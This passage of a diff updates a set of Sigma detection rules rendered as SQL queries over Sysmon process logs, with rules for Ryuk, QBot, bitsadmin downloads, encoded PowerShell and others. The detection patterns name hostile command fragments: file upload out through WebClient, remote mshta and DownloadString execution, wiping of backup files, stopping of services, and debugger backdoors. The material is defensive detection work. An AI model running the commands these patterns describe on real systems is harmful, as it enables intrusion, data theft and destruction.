WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE 
'%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_ryuk.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Potential Baby Shark Malware Activity", - "id": "2b30fa36-3a18-402f-a22d-bf4ce2189f35", - "status": "test", - "description": "Detects activity that could be related to Baby Shark malware", - "author": "Florian Roth (Nextron Systems)", - "tags": [ + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ "attack.execution", - "attack.defense_evasion", - "attack.discovery", - "attack.t1012", - "attack.t1059.003", - "attack.t1059.001", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Rare legitimate inline scripting by some administrators" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%powershell.exe mshta.exe http%' ESCAPE '\\' AND CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%reg query \"HKEY\\_CURRENT\\_USER\\\\Software\\\\Microsoft\\\\Terminal Server Client\\\\Default\"%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c taskkill /im cmd.exe%' ESCAPE '\\' OR CommandLine LIKE '%(New-Object System.Net.WebClient).UploadFile(''http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_babyshark.yml" + "filename": 
"proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Audit Policy Tampering Via Auditpol", - "id": "0a13e132-651d-11eb-ae93-0242ac130002", - "status": "test", - "description": "Threat actors can use auditpol binary to change audit policy configuration to impair detection capability.\nThis can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.\n", - "author": "Janantha Marasinghe (https://github.com/blueteam0ps)", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1562.002" + "attack.t1055" ], "falsepositives": [ - "Administrator or administrator scripts might leverage the flags mentioned in the detection section. 
Either way, it should always be monitored" + "Legitimate use of Msra.exe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\auditpol.exe' ESCAPE '\\' OR OriginalFileName = 'AUDITPOL.EXE') AND (CommandLine LIKE '%disable%' ESCAPE '\\' OR CommandLine LIKE '%clear%' ESCAPE '\\' OR CommandLine LIKE '%remove%' ESCAPE '\\' OR CommandLine LIKE '%restore%' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_auditpol_susp_execution.yml" - }, - { - "title": "Potential QBot Activity", - "id": "4fcac6eb-0287-4090-8eea-2602e4c20040", - "status": "stable", - "description": "Detects potential QBot activity by looking for process executions used previously by QBot", - "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.execution", - "attack.t1059.005" - ], - "falsepositives": [ - "Unlikely" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\WinRAR.exe' ESCAPE '\\' AND Image LIKE '%\\\\wscript.exe' ESCAPE '\\') OR CommandLine LIKE '% /c ping.exe -n 6 127.0.0.1 & type %' ESCAPE '\\' OR (CommandLine LIKE '%regsvr32.exe%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (Image LIKE '%\\\\arp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE '\\' OR Image LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR Image LIKE '%\\\\route.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_qbot.yml" + "filename": 
"proc_creation_win_msra_process_injection.yml" }, { - "title": "Add SafeBoot Keys Via Reg Utility", - "id": "d7662ff6-9e97-4596-a61d-9839e32dee8d", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", "status": "experimental", - "description": "Detects execution of \"reg.exe\" commands with the \"add\" or \"copy\" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unlikely" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\SafeBoot%' ESCAPE '\\' AND (CommandLine LIKE '% copy %' ESCAPE '\\' OR CommandLine LIKE '% add %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE 
'%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_add_safeboot.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TropicTrooper Campaign November 2018", - "id": "8c7090c3-e0a0-4944-bd08-08c3a0cecf79", - "status": "stable", - "description": "Detects TropicTrooper activity, an actor who targeted high-profile organizations in the energy and food and beverage sectors in Asia", - "author": "@41thexplorer, Microsoft Defender ATP", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", + "status": "test", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. 
Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%abCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCc%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE '\\' OR CommandLine LIKE '% aWV4I%' ESCAPE '\\' OR CommandLine LIKE '% IAA%' ESCAPE '\\' OR CommandLine LIKE '% IAB%' ESCAPE '\\' OR CommandLine LIKE '% UwB%' ESCAPE '\\' OR CommandLine LIKE '% cwB%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -ENCOD %' ESCAPE '\\' OR CommandLine LIKE '% BA^J e-%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '% -ExecutionPolicy remotesigned %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_tropictrooper.yml" + "filename": "proc_creation_win_powershell_base64_encoded_cmd.yml" }, { - "title": "Suspicious Debugger Registration Cmdline", - "id": "ae215552-081e-44c7-805f-be16f975c8a2", - "status": "test", - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "title": "Exchange PowerShell Snap-Ins Usage", + "id": "25676e10-2121-446e-80a4-71ff8506af47", + "status": "experimental", + "description": "Detects adding and using Exchange PowerShell snap-ins to export mailbox data. 
As seen used by HAFNIUM and APT27", + "author": "FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" + "attack.execution", + "attack.t1059.001", + "attack.collection", + "attack.t1114" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND CommandLine LIKE '%Add-PSSnapin%' ESCAPE '\\' AND (CommandLine LIKE '%Microsoft.Exchange.Powershell.Snapin%' ESCAPE '\\' OR CommandLine LIKE '%Microsoft.Exchange.Management.PowerShell.SnapIn%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND CommandLine LIKE '%$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" + "filename": "proc_creation_win_powershell_snapins_hafnium.yml" }, { - "title": "Potential CVE-2021-40444 Exploitation Attempt", - "id": "894397c6-da03-425c-a589-3d09e7d1f750", + "title": "HackTool - Koadic Execution", + "id": "5cddf373-ef00-4112-ad72-960ac29bac34", "status": "test", - "description": "Detects potential 
exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", - "author": "Florian Roth (Nextron Systems), @neonprimetime", + "description": "Detects command line parameters used by Koadic hack tool", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%/q%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%chcp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2021_40444.yml" + "filename": "proc_creation_win_hktl_koadic.yml" }, { - "title": "Suspicious Shells Spawned by Java", - "id": "0d34ed8b-1c12-4ff2-828c-16fc860b766d", - "status": "experimental", - "description": "Detects suspicious shell spawned from Java host process (e.g. log4j exploitation)", - "author": "Andreas Hunkeler (@Karneades), Florian Roth", + "title": "NtdllPipe Like Activity Execution", + "id": "bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2", + "status": "test", + "description": "Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. 
As seen being used in the POC NtdllPipe", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate calls to system binaries", - "Company specific internal usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR Image LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR Image LIKE '%\\\\curl.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%type \\%windir\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type \\%systemroot\\%\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR CommandLine LIKE '%type c:\\\\windows\\\\system32\\\\ntdll.dll%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\ntdll.dll > \\\\\\\\.\\\\pipe\\\\\\*' ESCAPE '\\'))" ], - "filename": "proc_creation_win_java_susp_child_process.yml" + "filename": "proc_creation_win_cmd_ntdllpipe_redirect.yml" }, { - "title": "Suspicious Serv-U Process Pattern", - "id": "58f4ea09-0fc2-4520-ba18-b85c540b0eaf", - "status": "experimental", - "description": "Detects a suspicious process pattern which could be a sign of an exploited Serv-U service", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Service Path Modification", + "id": "138d3531-8793-4f50-a2cd-f291b2863d78", + "status": "test", + "description": "Detects service path modification via the \"sc\" binary to a suspicious command or path", + "author": "Victor Sergeev, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1555", - "cve.2021.35211" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ - "Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Serv-U.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\sh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bash.exe' ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR Image LIKE '%\\\\scriptrunner.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND 
Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%cmd %' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%svchost%' ESCAPE '\\' OR CommandLine LIKE '%dllhost%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_servu_susp_child_process.yml" + "filename": "proc_creation_win_sc_service_path_modification.yml" }, { - "title": "Exploit for CVE-2017-8759", - "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "title": "Potential Defense Evasion Via Rename Of Highly Relevant Binaries", + "id": "0ba1da6d-b6ce-4366-828c-18826c9de23e", "status": "test", - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green - @mgreen27, Florian Roth (Nextron Systems), frack113", "tags": [ - "attack.execution", - 
"attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" + "attack.defense_evasion", + "attack.t1036.003", + "car.2013-05-009" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist", + "PsExec installed via Windows Store doesn't contain original filename field (False negative)" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND Image LIKE '%\\\\csc.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'Execute processes remotely' OR Product = 'Sysinternals PsExec' OR (Description LIKE 'Windows PowerShell%' ESCAPE '\\' OR Description LIKE 'pwsh%' ESCAPE '\\') OR (OriginalFileName LIKE 'powershell.exe' ESCAPE '\\' OR OriginalFileName LIKE 'pwsh.dll' ESCAPE '\\' OR OriginalFileName LIKE 'powershell\\_ise.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'psexec.c' ESCAPE '\\' OR OriginalFileName LIKE 'psexesvc.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wscript.exe' ESCAPE '\\' OR OriginalFileName LIKE 'mshta.exe' ESCAPE '\\' OR OriginalFileName LIKE 'regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'wmic.exe' ESCAPE '\\' OR OriginalFileName LIKE 'certutil.exe' ESCAPE '\\' OR OriginalFileName LIKE 'rundll32.exe' ESCAPE '\\' OR OriginalFileName LIKE 'cmstp.exe' ESCAPE '\\' OR OriginalFileName LIKE 'msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE 'reg.exe' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec64.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\PSEXESVC.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_exploit_cve_2017_8759.yml" + "filename": "proc_creation_win_renamed_binary_highly_relevant.yml" }, { - "title": "Potential PowerShell Execution Via DLL", - "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", - "status": "test", - "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", - "author": "Markus Neis, Nasreddine Bencherchali", + "title": "Use of W32tm as Timer", + "id": "6da2c9f5-7c53-401b-aacb-92c040ce1215", + "status": "experimental", + "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.discovery", + "attack.t1124" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE 
'\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\w32tm.exe' ESCAPE '\\' OR OriginalFileName = 'w32time.dll') AND (CommandLine LIKE '%/stripchart%' ESCAPE '\\' AND CommandLine LIKE '%/computer:%' ESCAPE '\\' AND CommandLine LIKE '%/period:%' ESCAPE '\\' AND CommandLine LIKE '%/dataonly%' ESCAPE '\\' AND CommandLine LIKE '%/samples:%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_dll_execution.yml" + "filename": "proc_creation_win_w32tm.yml" }, { - "title": "Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt", - "id": "245f92e3-c4da-45f1-9070-bc552e06db11", + "title": "Suspicious LOLBIN AccCheckConsole", + "id": "0f6da907-5854-4be6-859a-e9958747b0aa", "status": "test", - "description": "Detects spawning of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084", - "author": "Bhabesh Raj", + "description": "Detects suspicious LOLBIN AccCheckConsole execution with parameters as used to load an arbitrary DLL", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.execution", - "attack.t1190", - "attack.t1059" + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate use of the UI Accessibility Checker" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\Atlassian\\\\Confluence\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cmd 